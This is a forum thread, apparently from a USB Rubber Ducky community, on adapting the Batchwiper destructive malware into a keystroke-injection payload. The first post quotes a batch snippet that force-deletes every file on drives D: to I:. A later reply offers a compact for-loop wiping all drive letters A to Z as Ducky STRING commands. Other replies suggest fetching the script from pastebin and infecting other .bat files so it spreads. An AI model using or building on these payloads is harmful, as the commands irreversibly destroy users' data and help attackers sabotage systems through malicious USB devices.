Jump to content

[Suggestion] Batchwiper payload via Ducky?


Recommended Posts

The Iranian CERT has posted notification on a piece of destructive malware based on simple batch files. AlienVault Labs has a writeup here:

http://labs.alienvault.com/labs/index.php/2012/batchwiper-just-another-wiping-malware/

They posit that this could be spread by USB.

I'm thinking it would be incredibly simple to adapt this into ducky script.

Not saying you should go formatting drives, just an interesting observation. I mean it literally is dead simple, look at this code snippet:


sleep for 3000
IF EXIST d:\ del “d:\*.*” /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del “e:\*.*” /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del “f:\*.*” /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del “g:\*.*” /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del “h:\*.*” /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del “i:\*.*” /q /s /f
IF EXIST i:\ Chkdsk i:
[/CODE]

What are your thoughts on this?

Link to comment
Share on other sites

Looks interesting.. Not often you see malware written in batch! I wonder what the reasoning behind it was? The selective dates make it look like a very bespoke but of work meant to target quite a specific group.

As far as porting to the Ducky, it shouldn't be too hard, perhaps the quickest would be to download the batch script from pastebin and run it?

Link to comment
Share on other sites

Hmmm, rather destructive.

From a commercial perspective - it would waste time and money. A decent forensic analysis should be able to recover data, again costing money.

From a home user perspective - it would be really annoying. Specially if I had the family camera connected!

Again your relying on user permissions, at home (likely an admin user) at work (likely a low level grunt).

Probably, achievable through executing the commands through multiple run-box's.

From an infection perspective, wouldnt it be better to write a malicious script in visual-basic or wscript to append that script (if permissions allow) to any *.bat file detected on the system (including attached drives).

We already know the ducky can call a script/binary from mass storage (therefore not reliant on internet connection for payload delivery).

Link to comment
Share on other sites

If I was .gov funded, I would do something more along the lines of http://media.blackhat.com/bh-us-11/Davis/BH_US_11-Davis_USB_Slides.pdf

the Ducky is a possible platform to exploit USB driver vulnerabilities. Its just hassle to find them, most of the easy exploitable bugs are now patched (in common drivers).

Link to comment
Share on other sites

I would hope any nuclear research facility would be running some kind of back up or something.

Now I know there are stupid people everywhere

I think the best way to mess with someone would not be blank there hard drive ( throws up a giant warning flag ) but to just modify a few section of a couple files ( takes forever to figure this out ).

As an example what if someone changed a few resistors on the file for the rubber ducky -- Would you check that before getting it manufactured.

this just reminds me of telling people new to linux

rm -rf /

Edited by leapole
Link to comment
Share on other sites

I would hope any nuclear research facility would be running some kind of back up or something.

Now I know there are stupid people everywhere

I think the best way to mess with someone would not be blank there hard drive ( throws up a giant warning flag ) but to just modify a few section of a couple files ( takes forever to figure this out ).

As an example what if someone changed a few resistors on the file for the rubber ducky -- Would you check that before getting it manufactured.

this just reminds me of telling people new to linux

rm -rf /

I would hope that any nuclear research facility wouldnt be running some kind of back up, If these weapons didnt exist the world would be a much safer place :)

Link to comment
Share on other sites

Page 27 of the PowerPoint midnitesnake posted contains the line:

The knowledge of how to emulate USB devices is not widespread

Interesting quote...

Yeah, the guy who wrote those slides cant even emulate USB devices. Thats where that quote comes from. I'd say the Teensy was quite widespread, since it was used to pwn the PS3. *cough*. Was speaking to him at Blackhat, he's just playing off other's work, that he mentioned on slide-10.

Philip Polstra (Uni of Dubuque) knows a lot more, and has written an interesting presentation & whitepaper:

Preventing “Oh Shit” Moments for €20 or Less - Black Hat

http://www.slideshar.../ppolstra/44con

Edited by midnitesnake
Link to comment
Share on other sites

Maybe modify that "for" loop I wrote to modify the SAM payload, to make the payload shorter.

STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt cd %a:\ )

STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\ del “%a:\*.*” /q /s /f)

haven't tested the above yet, for apparent reasons.

Edited by overwraith
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...